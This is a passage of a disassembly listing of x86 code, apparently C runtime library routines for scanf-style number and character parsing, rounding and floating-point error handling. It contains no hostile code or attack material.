jz short loc_42AA01
cmp [ebp+var_C], 70h
jnz short loc_42AA79
loc_42AA01: ; CODE XREF: sub_429E90+B69�j
cmp ds:dword_453DF0, 1
jle short loc_42AA26
push 80h
mov eax, [ebp+var_1D8]
push eax
call sub_427040
add esp, 8
mov [ebp+var_210], eax
jmp short loc_42AA43
; ---------------------------------------------------------------------------
loc_42AA26: ; CODE XREF: sub_429E90+B78�j
mov ecx, [ebp+var_1D8]
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 80h
mov [ebp+var_210], eax
loc_42AA43: ; CODE XREF: sub_429E90+B94�j
cmp [ebp+var_210], 0
jz short loc_42AA6C
mov ecx, [ebp+var_40]
shl ecx, 4
mov [ebp+var_40], ecx
mov edx, [ebp+var_1D8]
push edx
call sub_42B270
add esp, 4
mov [ebp+var_1D8], eax
jmp short loc_42AA74
; ---------------------------------------------------------------------------
loc_42AA6C: ; CODE XREF: sub_429E90+BBA�j
mov al, [ebp+var_18]
add al, 1
mov [ebp+var_18], al
loc_42AA74: ; CODE XREF: sub_429E90+BDA�j
jmp loc_42AAFB
; ---------------------------------------------------------------------------
loc_42AA79: ; CODE XREF: sub_429E90+B6F�j
cmp ds:dword_453DF0, 1
jle short loc_42AA9B
push 4
mov ecx, [ebp+var_1D8]
push ecx
call sub_427040
add esp, 8
mov [ebp+var_214], eax
jmp short loc_42AAB5
; ---------------------------------------------------------------------------
loc_42AA9B: ; CODE XREF: sub_429E90+BF0�j
mov edx, [ebp+var_1D8]
mov eax, ds:off_453BE4
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 4
mov [ebp+var_214], ecx
loc_42AAB5: ; CODE XREF: sub_429E90+C09�j
cmp [ebp+var_214], 0
jz short loc_42AAF2
cmp [ebp+var_C], 6Fh
jnz short loc_42AAE2
cmp [ebp+var_1D8], 38h
jge short loc_42AAD8
mov edx, [ebp+var_40]
shl edx, 3
mov [ebp+var_40], edx
jmp short loc_42AAE0
; ---------------------------------------------------------------------------
loc_42AAD8: ; CODE XREF: sub_429E90+C3B�j
mov al, [ebp+var_18]
add al, 1
mov [ebp+var_18], al
loc_42AAE0: ; CODE XREF: sub_429E90+C46�j
jmp short loc_42AAF0
; ---------------------------------------------------------------------------
loc_42AAE2: ; CODE XREF: sub_429E90+C32�j
mov ecx, [ebp+var_40]
mov edx, [ebp+var_40]
lea eax, [edx+ecx*4]
shl eax, 1
mov [ebp+var_40], eax
loc_42AAF0: ; CODE XREF: sub_429E90:loc_42AAE0�j
jmp short loc_42AAFB
; ---------------------------------------------------------------------------
loc_42AAF2: ; CODE XREF: sub_429E90+C2C�j
mov cl, [ebp+var_18]
add cl, 1
mov [ebp+var_18], cl
loc_42AAFB: ; CODE XREF: sub_429E90:loc_42AA74�j
; sub_429E90:loc_42AAF0�j
movsx edx, [ebp+var_18]
test edx, edx
jnz short loc_42AB5C
mov eax, [ebp+var_6C]
add eax, 1
mov [ebp+var_6C], eax
mov ecx, [ebp+var_1D8]
mov edx, [ebp+var_40]
lea eax, [edx+ecx-30h]
mov [ebp+var_40], eax
cmp [ebp+var_1E8], 0
jz short loc_42AB3F
mov ecx, [ebp+var_1C]
sub ecx, 1
mov [ebp+var_1C], ecx
cmp [ebp+var_1C], 0
jnz short loc_42AB3F
mov dl, [ebp+var_18]
add dl, 1
mov [ebp+var_18], dl
jmp short loc_42AB5A
; ---------------------------------------------------------------------------
loc_42AB3F: ; CODE XREF: sub_429E90+C93�j
; sub_429E90+CA2�j
mov eax, [ebp+var_20]
add eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42B2D0
add esp, 4
mov [ebp+var_1D8], eax
loc_42AB5A: ; CODE XREF: sub_429E90+CAD�j
jmp short loc_42AB78
; ---------------------------------------------------------------------------
loc_42AB5C: ; CODE XREF: sub_429E90+C71�j
mov edx, [ebp+var_20]
sub edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_1D8]
push ecx
call sub_42B330
add esp, 8
loc_42AB78: ; CODE XREF: sub_429E90:loc_42AB5A�j
jmp loc_42A9E9
; ---------------------------------------------------------------------------
loc_42AB7D: ; CODE XREF: sub_429E90+B5F�j
movsx edx, [ebp+var_68]
test edx, edx
jz short loc_42AB8D
mov eax, [ebp+var_40]
neg eax
mov [ebp+var_40], eax
loc_42AB8D: ; CODE XREF: sub_429E90:loc_42A9E4�j
; sub_429E90+CF3�j
cmp [ebp+var_C], 46h
jnz short loc_42AB9A
mov [ebp+var_6C], 0
loc_42AB9A: ; CODE XREF: sub_429E90+D01�j
cmp [ebp+var_6C], 0
jz short loc_42ABE8
movsx ecx, [ebp+var_70]
test ecx, ecx
jnz short loc_42ABE6
mov edx, [ebp+var_34]
add edx, 1
mov [ebp+var_34], edx
loc_42ABB1: ; CODE XREF: sub_429E90+D70�j
cmp [ebp+var_1DC], 0
jz short loc_42ABCA
mov eax, [ebp+var_3C]
mov ecx, [ebp+var_30]
mov [eax], ecx
mov edx, [ebp+var_2C]
mov [eax+4], edx
jmp short loc_42ABE6
; ---------------------------------------------------------------------------
loc_42ABCA: ; CODE XREF: sub_429E90+D28�j
movsx eax, [ebp+var_38]
test eax, eax
jz short loc_42ABDC
mov ecx, [ebp+var_3C]
mov edx, [ebp+var_40]
mov [ecx], edx
jmp short loc_42ABE6
; ---------------------------------------------------------------------------
loc_42ABDC: ; CODE XREF: sub_429E90+D40�j
mov eax, [ebp+var_3C]
mov cx, word ptr [ebp+var_40]
mov [eax], cx
loc_42ABE6: ; CODE XREF: sub_429E90+D16�j
; sub_429E90+D38�j ...
jmp short loc_42ABED
; ---------------------------------------------------------------------------
loc_42ABE8: ; CODE XREF: sub_429E90+D0E�j
jmp loc_42B17A
; ---------------------------------------------------------------------------
loc_42ABED: ; CODE XREF: sub_429E90:loc_42ABE6�j
jmp loc_42B024
; ---------------------------------------------------------------------------
loc_42ABF2: ; CODE XREF: sub_429E90+3C4�j
; DATA XREF: _0:0042B236�o
mov edx, [ebp+var_20]
mov [ebp+var_40], edx
movsx eax, [ebp+var_70]
test eax, eax
jnz short loc_42AC02
jmp short loc_42ABB1
; ---------------------------------------------------------------------------
loc_42AC02: ; CODE XREF: sub_429E90+D6E�j
jmp loc_42B024
; ---------------------------------------------------------------------------
loc_42AC07: ; CODE XREF: sub_429E90+3C4�j
; DATA XREF: _0:0042B22E�o
lea ecx, [ebp+var_1D0]
mov [ebp+var_1E0], ecx
cmp [ebp+var_1D8], 2Dh
jnz short loc_42AC36
mov edx, [ebp+var_1E0]
mov byte ptr [edx], 2Dh
mov eax, [ebp+var_1E0]
add eax, 1
mov [ebp+var_1E0], eax
jmp short loc_42AC3F
; ---------------------------------------------------------------------------
loc_42AC36: ; CODE XREF: sub_429E90+D8A�j
cmp [ebp+var_1D8], 2Bh
jnz short loc_42AC63
loc_42AC3F: ; CODE XREF: sub_429E90+DA4�j
mov ecx, [ebp+var_1C]
sub ecx, 1
mov [ebp+var_1C], ecx
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
call sub_42B2D0
add esp, 4
mov [ebp+var_1D8], eax
loc_42AC63: ; CODE XREF: sub_429E90+DAD�j
cmp [ebp+var_1E8], 0
jz short loc_42AC75
cmp [ebp+var_1C], 15Dh
jle short loc_42AC7C
loc_42AC75: ; CODE XREF: sub_429E90+DDA�j
mov [ebp+var_1C], 15Dh
loc_42AC7C: ; CODE XREF: sub_429E90+DE3�j
; sub_429E90+E82�j
cmp ds:dword_453DF0, 1
jle short loc_42AC9E
push 4
mov ecx, [ebp+var_1D8]
push ecx
call sub_427040
add esp, 8
mov [ebp+var_218], eax
jmp short loc_42ACB8
; ---------------------------------------------------------------------------
loc_42AC9E: ; CODE XREF: sub_429E90+DF3�j
mov edx, [ebp+var_1D8]
mov eax, ds:off_453BE4
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 4
mov [ebp+var_218], ecx
loc_42ACB8: ; CODE XREF: sub_429E90+E0C�j
cmp [ebp+var_218], 0
jz short loc_42AD17
mov edx, [ebp+var_1C]
mov eax, [ebp+var_1C]
sub eax, 1
mov [ebp+var_1C], eax
test edx, edx
jz short loc_42AD17
mov ecx, [ebp+var_6C]
add ecx, 1
mov [ebp+var_6C], ecx
mov edx, [ebp+var_1E0]
mov al, byte ptr [ebp+var_1D8]
mov [edx], al
mov ecx, [ebp+var_1E0]
add ecx, 1
mov [ebp+var_1E0], ecx
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
call sub_42B2D0
add esp, 4
mov [ebp+var_1D8], eax
jmp loc_42AC7C
; ---------------------------------------------------------------------------
loc_42AD17: ; CODE XREF: sub_429E90+E2F�j
; sub_429E90+E3F�j
movsx ecx, ds:byte_453DF4
movsx edx, byte ptr [ebp+var_1D8]
cmp ecx, edx
jnz loc_42AE14
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_1C]
sub ecx, 1
mov [ebp+var_1C], ecx
test eax, eax
jz loc_42AE14
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
call sub_42B2D0
add esp, 4
mov [ebp+var_1D8], eax
mov ecx, [ebp+var_1E0]
mov dl, ds:byte_453DF4
mov [ecx], dl
mov eax, [ebp+var_1E0]
add eax, 1
mov [ebp+var_1E0], eax
loc_42AD79: ; CODE XREF: sub_429E90+F7F�j
cmp ds:dword_453DF0, 1
jle short loc_42AD9B
push 4
mov ecx, [ebp+var_1D8]
push ecx
call sub_427040
add esp, 8
mov [ebp+var_21C], eax
jmp short loc_42ADB5
; ---------------------------------------------------------------------------
loc_42AD9B: ; CODE XREF: sub_429E90+EF0�j
mov edx, [ebp+var_1D8]
mov eax, ds:off_453BE4
xor ecx, ecx
mov cx, [eax+edx*2]
and ecx, 4
mov [ebp+var_21C], ecx
loc_42ADB5: ; CODE XREF: sub_429E90+F09�j
cmp [ebp+var_21C], 0
jz short loc_42AE14
mov edx, [ebp+var_1C]
mov eax, [ebp+var_1C]
sub eax, 1
mov [ebp+var_1C], eax
test edx, edx
jz short loc_42AE14
mov ecx, [ebp+var_6C]
add ecx, 1
mov [ebp+var_6C], ecx
mov edx, [ebp+var_1E0]
mov al, byte ptr [ebp+var_1D8]
mov [edx], al
mov ecx, [ebp+var_1E0]
add ecx, 1
mov [ebp+var_1E0], ecx
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
call sub_42B2D0
add esp, 4
mov [ebp+var_1D8], eax
jmp loc_42AD79
; ---------------------------------------------------------------------------
loc_42AE14: ; CODE XREF: sub_429E90+E97�j
; sub_429E90+EAB�j ...
cmp [ebp+var_6C], 0
jz loc_42AF79
cmp [ebp+var_1D8], 65h
jz short loc_42AE34
cmp [ebp+var_1D8], 45h
jnz loc_42AF79
loc_42AE34: ; CODE XREF: sub_429E90+F95�j
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_1C]
sub edx, 1
mov [ebp+var_1C], edx
test ecx, ecx
jz loc_42AF79
mov eax, [ebp+var_1E0]
mov byte ptr [eax], 65h
mov ecx, [ebp+var_1E0]
add ecx, 1
mov [ebp+var_1E0], ecx
mov edx, [ebp+var_20]
add edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
call sub_42B2D0
add esp, 4
mov [ebp+var_1D8], eax
cmp [ebp+var_1D8], 2Dh
jnz short loc_42AE9E
mov ecx, [ebp+var_1E0]
mov byte ptr [ecx], 2Dh
mov edx, [ebp+var_1E0]
add edx, 1
mov [ebp+var_1E0], edx
jmp short loc_42AEA7
; ---------------------------------------------------------------------------
loc_42AE9E: ; CODE XREF: sub_429E90+FF2�j
cmp [ebp+var_1D8], 2Bh
jnz short loc_42AEDD
loc_42AEA7: ; CODE XREF: sub_429E90+100C�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_1C]
sub ecx, 1
mov [ebp+var_1C], ecx
test eax, eax
jnz short loc_42AEC2
mov edx, [ebp+var_1C]
add edx, 1
mov [ebp+var_1C], edx
jmp short loc_42AEDD
; ---------------------------------------------------------------------------
loc_42AEC2: ; CODE XREF: sub_429E90+1025�j
mov eax, [ebp+var_20]
add eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42B2D0
add esp, 4
mov [ebp+var_1D8], eax
loc_42AEDD: ; CODE XREF: sub_429E90+1015�j
; sub_429E90+1030�j ...
cmp ds:dword_453DF0, 1
jle short loc_42AEFF
push 4
mov edx, [ebp+var_1D8]
push edx
call sub_427040
add esp, 8
mov [ebp+var_220], eax
jmp short loc_42AF1A
; ---------------------------------------------------------------------------
loc_42AEFF: ; CODE XREF: sub_429E90+1054�j
mov eax, [ebp+var_1D8]
mov ecx, ds:off_453BE4
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 4
mov [ebp+var_220], edx
loc_42AF1A: ; CODE XREF: sub_429E90+106D�j
cmp [ebp+var_220], 0
jz short loc_42AF79
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_1C]
sub ecx, 1
mov [ebp+var_1C], ecx
test eax, eax
jz short loc_42AF79
mov edx, [ebp+var_6C]
add edx, 1
mov [ebp+var_6C], edx
mov eax, [ebp+var_1E0]
mov cl, byte ptr [ebp+var_1D8]
mov [eax], cl
mov edx, [ebp+var_1E0]
add edx, 1
mov [ebp+var_1E0], edx
mov eax, [ebp+var_20]
add eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42B2D0
add esp, 4
mov [ebp+var_1D8], eax
jmp loc_42AEDD
; ---------------------------------------------------------------------------
loc_42AF79: ; CODE XREF: sub_429E90+F88�j
; sub_429E90+F9E�j ...
mov edx, [ebp+var_20]
sub edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_1D8]
push ecx
call sub_42B330
add esp, 8
cmp [ebp+var_6C], 0
jz short loc_42AFD3
movsx edx, [ebp+var_70]
test edx, edx
jnz short loc_42AFD1
mov eax, [ebp+var_34]
add eax, 1
mov [ebp+var_34], eax
mov ecx, [ebp+var_1E0]
mov byte ptr [ecx], 0
lea edx, [ebp+var_1D0]
push edx
mov eax, [ebp+var_3C]
push eax
movsx ecx, [ebp+var_38]
sub ecx, 1
push ecx
call ds:off_454198
add esp, 0Ch
loc_42AFD1: ; CODE XREF: sub_429E90+1111�j
jmp short loc_42AFD8
; ---------------------------------------------------------------------------
loc_42AFD3: ; CODE XREF: sub_429E90+1109�j
jmp loc_42B17A
; ---------------------------------------------------------------------------
loc_42AFD8: ; CODE XREF: sub_429E90:loc_42AFD1�j
jmp short loc_42B024
; ---------------------------------------------------------------------------
loc_42AFDA: ; CODE XREF: sub_429E90+3B0�j
; sub_429E90+3C4�j
; DATA XREF: ...
mov edx, [ebp+arg_4]
xor eax, eax
mov al, [edx]
cmp eax, [ebp+var_1D8]
jz short loc_42B00A
mov ecx, [ebp+var_20]
sub ecx, 1
mov [ebp+var_20], ecx
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+var_1D8]
push eax
call sub_42B330
add esp, 8
jmp loc_42B17A
; ---------------------------------------------------------------------------
loc_42B00A: ; CODE XREF: sub_429E90+1157�j
mov cl, [ebp+var_28]
sub cl, 1
mov [ebp+var_28], cl
movsx edx, [ebp+var_70]
test edx, edx
jnz short loc_42B024
mov eax, [ebp+var_1D4]
mov [ebp+arg_8], eax
loc_42B024: ; CODE XREF: sub_429E90:loc_42A686�j
; sub_429E90:loc_42ABED�j ...
mov cl, [ebp+var_28]
add cl, 1
mov [ebp+var_28], cl
jmp short loc_42B050
; ---------------------------------------------------------------------------
loc_42B02F: ; CODE XREF: sub_429E90+38B�j
mov edx, [ebp+var_20]
sub edx, 1
mov [ebp+var_20], edx
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_1D8]
push ecx
call sub_42B330
add esp, 8
jmp loc_42B17A
; ---------------------------------------------------------------------------
loc_42B050: ; CODE XREF: sub_429E90+119D�j
mov edx, [ebp+arg_4]
add edx, 1
mov [ebp+arg_4], edx
jmp loc_42B151
; ---------------------------------------------------------------------------
loc_42B05E: ; CODE XREF: sub_429E90+11D�j
mov eax, [ebp+var_20]
add eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov esi, edx
mov eax, [ebp+arg_0]
push eax
call sub_42B2D0
add esp, 4
mov [ebp+var_1D8], eax
mov ecx, [ebp+var_1D8]
mov edx, [ebp+arg_4]
add edx, 1
mov [ebp+arg_4], edx
cmp esi, ecx
jz short loc_42B0B6
mov eax, [ebp+var_20]
sub eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_1D8]
push edx
call sub_42B330
add esp, 8
jmp loc_42B17A
; ---------------------------------------------------------------------------
loc_42B0B6: ; CODE XREF: sub_429E90+1203�j
mov eax, [ebp+var_1D8]
and eax, 0FFh
mov ecx, ds:off_453BE4
xor edx, edx
mov dx, [ecx+eax*2]
and edx, 8000h
test edx, edx
jz short loc_42B151
mov eax, [ebp+var_20]
add eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
mov esi, edx
mov eax, [ebp+arg_0]
push eax
call sub_42B2D0
add esp, 4
mov [ebp+var_1F4], eax
mov ecx, [ebp+var_1F4]
mov edx, [ebp+arg_4]
add edx, 1
mov [ebp+arg_4], edx
cmp esi, ecx
jz short loc_42B148
mov eax, [ebp+var_20]
sub eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_1F4]
push edx
call sub_42B330
add esp, 8
mov eax, [ebp+var_20]
sub eax, 1
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_1D8]
push edx
call sub_42B330
add esp, 8
jmp short loc_42B17A
; ---------------------------------------------------------------------------
loc_42B148: ; CODE XREF: sub_429E90+127C�j
mov eax, [ebp+var_20]
sub eax, 1
mov [ebp+var_20], eax
loc_42B151: ; CODE XREF: sub_429E90+11C9�j
; sub_429E90+1245�j
cmp [ebp+var_1D8], 0FFFFFFFFh
jnz short loc_42B175
mov ecx, [ebp+arg_4]
xor edx, edx
mov dl, [ecx]
cmp edx, 25h
jnz short loc_42B173
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cl, [eax+1]
cmp ecx, 6Eh
jz short loc_42B175
loc_42B173: ; CODE XREF: sub_429E90+12D4�j
jmp short loc_42B17A
; ---------------------------------------------------------------------------
loc_42B175: ; CODE XREF: sub_429E90+12C8�j
; sub_429E90+12E1�j
jmp loc_429F07
; ---------------------------------------------------------------------------
loc_42B17A: ; CODE XREF: sub_429E90+80�j
; sub_429E90+635�j ...
cmp [ebp+var_1D8], 0FFFFFFFFh
jnz short loc_42B1AE
cmp [ebp+var_34], 0
jnz short loc_42B19D
movsx edx, [ebp+var_28]
test edx, edx
jnz short loc_42B19D
mov [ebp+var_224], 0FFFFFFFFh
jmp short loc_42B1A6
; ---------------------------------------------------------------------------
loc_42B19D: ; CODE XREF: sub_429E90+12F7�j
; sub_429E90+12FF�j
mov eax, [ebp+var_34]
mov [ebp+var_224], eax
loc_42B1A6: ; CODE XREF: sub_429E90+130B�j
mov eax, [ebp+var_224]
jmp short loc_42B1B1
; ---------------------------------------------------------------------------
loc_42B1AE: ; CODE XREF: sub_429E90+12F1�j
mov eax, [ebp+var_34]
loc_42B1B1: ; CODE XREF: sub_429E90+131C�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_429E90 endp
; ---------------------------------------------------------------------------
off_42B1B8 dd offset loc_42A14A ; DATA XREF: sub_429E90+239�r
dd offset loc_42A0D0
dd offset loc_42A0E8
dd offset loc_42A12C
dd offset loc_42A0D5
dd offset loc_42A137
dd offset loc_42A13F
dd offset loc_42A155
byte_42B1D8 db 0 ; DATA XREF: sub_429E90+233�r
db 3 dup(7)
dd 6 dup(7070707h), 2070701h, 7030707h, 7070701h, 5 dup(7070707h)
dd 7040707h, 7050707h, 2 dup(7070707h)
db 7, 6
off_42B226 dd offset loc_42A25B ; DATA XREF: sub_429E90+3C4�r
dd offset loc_42A794
dd offset loc_42AC07
dd offset loc_42A68B
dd offset loc_42ABF2
dd offset loc_42A790
dd offset loc_42A2A1
dd offset loc_42A692
dd offset loc_42A2C6
dd offset loc_42AFDA
byte_42B24E db 0 ; DATA XREF: sub_429E90+3BE�r
db 1
dd 9020202h, 9090903h, 5010409h, 9060909h, 7090901h, 0CC080909h
dd 2 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B270 proc near ; CODE XREF: sub_429E90+9E9�p
; sub_429E90+BCC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
cmp ds:dword_453DF0, 1
jle short loc_42B292
push 4
mov eax, [ebp+arg_0]
push eax
call sub_427040
add esp, 8
mov [ebp+var_4], eax
jmp short loc_42B2A7
; ---------------------------------------------------------------------------
loc_42B292: ; CODE XREF: sub_42B270+D�j
mov ecx, [ebp+arg_0]
mov edx, ds:off_453BE4
xor eax, eax
mov ax, [edx+ecx*2]
and eax, 4
mov [ebp+var_4], eax
loc_42B2A7: ; CODE XREF: sub_42B270+20�j
cmp [ebp+var_4], 0
jz short loc_42B2B5
mov ecx, [ebp+arg_0]
mov [ebp+var_8], ecx
jmp short loc_42B2C1
; ---------------------------------------------------------------------------
loc_42B2B5: ; CODE XREF: sub_42B270+3B�j
mov edx, [ebp+arg_0]
and edx, 0FFFFFFDFh
sub edx, 7
mov [ebp+var_8], edx
loc_42B2C1: ; CODE XREF: sub_42B270+43�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_42B270 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B2D0 proc near ; CODE XREF: sub_429E90+370�p
; sub_429E90+698�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
sub ecx, 1
mov edx, [ebp+arg_0]
mov [edx+4], ecx
mov eax, [ebp+arg_0]
cmp dword ptr [eax+4], 0
jl short loc_42B30B
mov ecx, [ebp+arg_0]
mov edx, [ecx]
movsx eax, byte ptr [edx]
and eax, 0FFh
mov [ebp+var_4], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax], edx
jmp short loc_42B31A
; ---------------------------------------------------------------------------
loc_42B30B: ; CODE XREF: sub_42B2D0+1A�j
mov ecx, [ebp+arg_0]
push ecx
call sub_427100
add esp, 4
mov [ebp+var_4], eax
loc_42B31A: ; CODE XREF: sub_42B2D0+39�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_42B2D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B330 proc near ; CODE XREF: sub_429E90+EC�p
; sub_429E90+666�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0FFFFFFFFh
jz short loc_42B349
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_431E10
add esp, 8
loc_42B349: ; CODE XREF: sub_42B330+7�j
pop ebp
retn
sub_42B330 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42B350 proc near ; CODE XREF: sub_429E90+E3�p
; sub_429E90+353�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
loc_42B354: ; CODE XREF: sub_42B350+30�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx], ecx
mov eax, [ebp+arg_4]
push eax
call sub_42B2D0
add esp, 4
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
push ecx
call sub_421940
add esp, 4
test eax, eax
jz short loc_42B382
jmp short loc_42B354
; ---------------------------------------------------------------------------
loc_42B382: ; CODE XREF: sub_42B350+2E�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_42B350 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_42B390(double)
sub_42B390 proc near ; CODE XREF: sub_41FFF0+C3�p
; sub_420210+C3�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
fld [ebp+arg_0]
frndint
fstp [ebp+var_8]
fld [ebp+var_8]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_42B390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_42B3B0(int,double,int)
sub_42B3B0 proc near ; CODE XREF: sub_41FFF0+85�p
; sub_420210+85�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp ds:dword_454450, 0
jnz short loc_42B3E4
mov eax, [ebp+arg_C]
push eax ; int
mov ecx, [ebp+10h]
push ecx
mov edx, [ebp+arg_4]
push edx ; double
push 0 ; int
push 0 ; int
mov eax, [ebp+10h]
push eax ; int
mov ecx, [ebp+arg_4]
push ecx ; int
mov edx, [ebp+arg_0]
push edx ; int
push 1 ; int
call sub_42BE60
add esp, 24h
jmp short loc_42B403
; ---------------------------------------------------------------------------
loc_42B3E4: ; CODE XREF: sub_42B3B0+A�j
call sub_429A90
mov dword ptr [eax], 21h
push 0FFFFh
mov eax, [ebp+arg_C]
push eax
call sub_42C2F0
add esp, 8
fld qword ptr [ebp+arg_4]
loc_42B403: ; CODE XREF: sub_42B3B0+32�j
pop ebp
retn
sub_42B3B0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 8
fld qword ptr [ebp+0Ch]
fadd qword ptr [ebp+14h]
fstp qword ptr [ebp-8]
cmp ds:dword_454450, 0
jnz short loc_42B454
mov eax, [ebp+1Ch]
push eax
mov ecx, [ebp-4]
push ecx
mov edx, [ebp-8]
push edx
mov eax, [ebp+18h]
push eax
mov ecx, [ebp+14h]
push ecx
mov edx, [ebp+10h]
push edx
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp+8]
push ecx
push 1
call sub_42BE60
add esp, 24h
jmp short loc_42B473
; ---------------------------------------------------------------------------
loc_42B454: ; CODE XREF: _0:0042B426�j
call sub_429A90
mov dword ptr [eax], 21h
push 0FFFFh
mov edx, [ebp+1Ch]
push edx
call sub_42C2F0
add esp, 8
fld qword ptr [ebp-8]
loc_42B473: ; CODE XREF: _0:0042B452�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_42B480(int,int,int,int,double,int)
sub_42B480 proc near ; CODE XREF: sub_41FFF0+B1�p
; sub_41FFF0+129�p ...
var_5C = byte ptr -5Ch
var_24 = dword ptr -24h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = qword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 5Ch
mov eax, [ebp+arg_18]
push eax
lea ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_42BAE0
add esp, 0Ch
test eax, eax
jnz short loc_42B4C6
mov eax, [ebp+var_24]
and al, 0FEh
mov [ebp+var_24], eax
lea ecx, [ebp+arg_10]
push ecx
lea edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
lea edx, [ebp+arg_18]
push edx
lea eax, [ebp+var_5C]
push eax
call sub_42B610
add esp, 18h
loc_42B4C6: ; CODE XREF: sub_42B480+1C�j
mov ecx, [ebp+arg_0]
push ecx
call sub_42BF80
add esp, 4
mov [ebp+var_4], eax
cmp ds:dword_454450, 0
jnz short loc_42B50E
cmp [ebp+var_4], 0
jz short loc_42B50E
mov edx, [ebp+arg_18]
push edx ; int
mov eax, dword ptr [ebp+arg_10+4]
push eax
mov ecx, dword ptr [ebp+arg_10]
push ecx ; double
push 0 ; int
push 0 ; int
mov edx, [ebp+arg_C]
push edx ; int
mov eax, [ebp+arg_8]
push eax ; int
mov ecx, [ebp+arg_4]
push ecx ; int
mov edx, [ebp+var_4]
push edx ; int
call sub_42BE60
add esp, 24h
jmp short loc_42B52E
; ---------------------------------------------------------------------------
loc_42B50E: ; CODE XREF: sub_42B480+5C�j
; sub_42B480+62�j
mov eax, [ebp+var_4]
push eax
call sub_42BF00
add esp, 4
push 0FFFFh
mov ecx, [ebp+arg_18]
push ecx
call sub_42C2F0
add esp, 8
fld [ebp+arg_10]
loc_42B52E: ; CODE XREF: sub_42B480+8C�j
mov esp, ebp
pop ebp
retn
sub_42B480 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 5Ch
mov eax, [ebp+28h]
push eax
lea ecx, [ebp+20h]
push ecx
mov edx, [ebp+8]
push edx
call sub_42BAE0
add esp, 0Ch
test eax, eax
jnz short loc_42B59E
